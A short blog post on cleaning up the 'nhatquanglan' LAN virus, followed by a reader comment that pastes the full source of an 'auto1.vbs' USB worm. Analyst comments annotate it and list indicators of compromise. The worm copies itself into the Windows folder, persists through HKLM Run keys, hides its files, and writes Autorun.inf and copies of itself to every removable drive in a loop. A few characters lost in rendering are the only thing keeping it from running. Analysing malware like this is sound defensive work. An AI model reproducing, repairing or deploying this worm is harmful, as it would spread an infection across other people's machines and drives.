solution for nhatquanglan found

I had to install this virus to find out what it does. Then I found a step-by-step solution for it. It spreads aggressively over the LAN: when I installed it, it sent its offspring to all the accessible shared folders on the network. Here’s how you can fix the problem:

https://piyushlabs.wordpress.com/nhatquanglan-new-folder-svchost/

One more problem: my friend JD’s pen drive is not working. It’s showing some write-protection error. I’ll soon find out what’s behind that. Wish me good luck.


21 Responses to “solution for nhatquanglan found”

  1. Kazuchi Says:

    I opened one of my Pen drives… and found this “Auto1.vbs” and “autorun.inf”

    Now I opened the VBS file in Notepad, and here is what it says.
    Shall I click on it, or is it just a way of infecting more?

    ' Analyst notes on this listing (auto1.vbs as pasted by the commenter):
    ' it is a self-copying script that persists through a Run key and re-infects
    ' removable drives via Autorun.inf. It answers the question above: running it
    ' installs it on the machine, it is not a cleanup tool.
    ' The blog rendering turned straight quotes into typographic ones and dropped
    ' the comparison operators in two If statements below, so the text is not
    ' valid VBScript exactly as shown.
    ' Indicators visible here: auto1.vbs in the Windows folder and on drive roots,
    ' Autorun.inf on removable drives, Run values "autoMe" and "autoMe1" under HKLM.

    ' Errors are suppressed for the whole script, so failures stay silent.
    On Error Resume Next
    Dim fso, wscr, tf, scrText, win, ax

    Set fso = CreateObject(“Scripting.FileSystemObject”)
    Set wscr = CreateObject(“WScript.Shell”)

    ' GetSpecialFolder(0) is the Windows folder; tf is this script's full path.
    win = fso.GetSpecialFolder(0)
    tf = WScript.ScriptFullName
    x = LCase(tf)

    ' Mid(x, 4) drops the "X:\" prefix, so this matches only when the script runs
    ' from a drive root. It then opens Explorer on that drive, so the user still
    ' sees the drive window they expected.
    If Mid(x, 4) = “auto1.vbs” Then
    wscr.Run “explorer.exe ” & fso.Getfile(tf).Drive.Path
    End If

    ' Reads its own source (mode 1 = ForReading) into scrText for later copies.
    Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
    Do Until myFile.AtEndOfStream
    scrText = scrText & myFile.ReadLine & vbCrLf
    Loop

    ' Records whether a copy already existed BEFORE it is (re)written below.
    ax = fso.FileExists(win & “\auto1.vbs”)

    ' Drops a copy into the Windows folder, overwriting any existing one.
    Set myFile = fso.CreateTextFile(win & “\auto1.vbs”, true)
    myFile.write scrText
    myFile.close

    ' 39 = ReadOnly(1) + Hidden(2) + System(4) + Archive(32): hidden from default Explorer views.
    Set fAttr = fso.Getfile(win & “\auto1.vbs”)
    fAttr.Attributes=39

    ' Persistence: machine-wide Run value "autoMe1" starts the copy at logon.
    wscr.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe1”, “wscript.exe “”” & win & “\auto1.vbs”””

    ' First install only: start the Windows-folder copy straight away.
    If ax = false Then wscr.Run “wscript.exe “”” & win & “\auto1.vbs”””

    ' Endless loop; one pass roughly every 10 seconds (see the Sleep at the bottom).
    While (true)

    Set myDrives = fso.Drives
    For Each myFlashDrive In myDrives

    ' DriveType 1 = removable. The operator before “A:” was lost in the page
    ' rendering; presumably "<>", i.e. skip the floppy drive -- confirm against a sample.
    If myFlashDrive.Drivetype = 1 And myFlashDrive.Path “A:” Then

    ' Any existing Autorun.inf is reset to Archive-only (32) and force-deleted.
    If fso.FileExists(myFlashDrive.Path & “\Autorun.inf”) Then
    Set fAttr = fso.Getfile(myFlashDrive.Path & “\Autorun.inf”)
    fAttr.Attributes=32
    fso.Deletefile myFlashDrive.Path & “\Autorun.inf”, true
    End If

    ' Writes an Autorun.inf whose open and shell\Open commands run auto1.vbs via wscript.exe.
    Set auFile = fso.CreateTextFile(myFlashDrive.Path & “\Autorun.inf”, true)
    auFile.write “[autorun]” & vbCrLf & “open=wscript.exe auto1.vbs” & vbCrLf & “shell\Open\Command=wscript.exe auto1.vbs” & vbCrLf & “shell\Open\Default=1”
    auFile.close

    ' Same hidden/system/read-only attribute set as the Windows-folder copy.
    Set fAttr = fso.Getfile(myFlashDrive.Path & “\Autorun.inf”)
    fAttr.Attributes=39

    ' Copies the script body to the root of the removable drive.
    Set myFile = fso.CreateTextFile(myFlashDrive.Path & “\auto1.vbs”, true)
    myFile.write scrText
    myFile.close

    Set fAttr = fso.Getfile(myFlashDrive.Path & “\auto1.vbs”)
    fAttr.Attributes=39

    End If

    Next

    ' Registry writes repeated on every pass, so manual changes are reverted
    ' within seconds while the script is running:
    '  - a second HKLM Run value, "autoMe", pointing at the same copy;
    '  - HKCU Explorer view settings (Hidden, HideFileExt, ShowSuperHidden);
    '  - HKCU policy values NoFolderOptions, DisableRegistryTools and
    '    DisableTaskMgr set to 0, i.e. those tools are left enabled;
    '  - NoDriveTypeAutoRun = 128 (0x80), which leaves the removable-drive
    '    bit (0x4) clear, so AutoRun stays enabled for USB media. This is the
    '    value the spread depends on; 0xFF disables AutoRun for all drive types.
    ' NOTE(review): Hidden = 0 is not one of the usual values (1 = show, 2 = hide);
    ' its effect is not established by this listing.
    With wscr
    .RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe”, “wscript.exe “”” & win & “\auto1.vbs”””
    .RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden”, 0, “REG_DWORD”
    .RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, 0, “REG_DWORD”
    .RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”, 1, “REG_DWORD”
    .RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 0, “REG_DWORD”
    .RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun”, 128, “REG_DWORD”
    .RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, 0, “REG_DWORD”
    .RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 0, “REG_DWORD”
    End With

    ' The operator between tf and win was also lost in rendering; presumably "<>".
    ' Read that way, an instance started from a drive exits once that drive is
    ' no longer ready, and the Windows-folder instance keeps looping.
    If tf win & “\auto1.vbs” Then
    If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
    End If

    ' 10000 ms pause between passes.
    WScript.Sleep 10000

    Wend
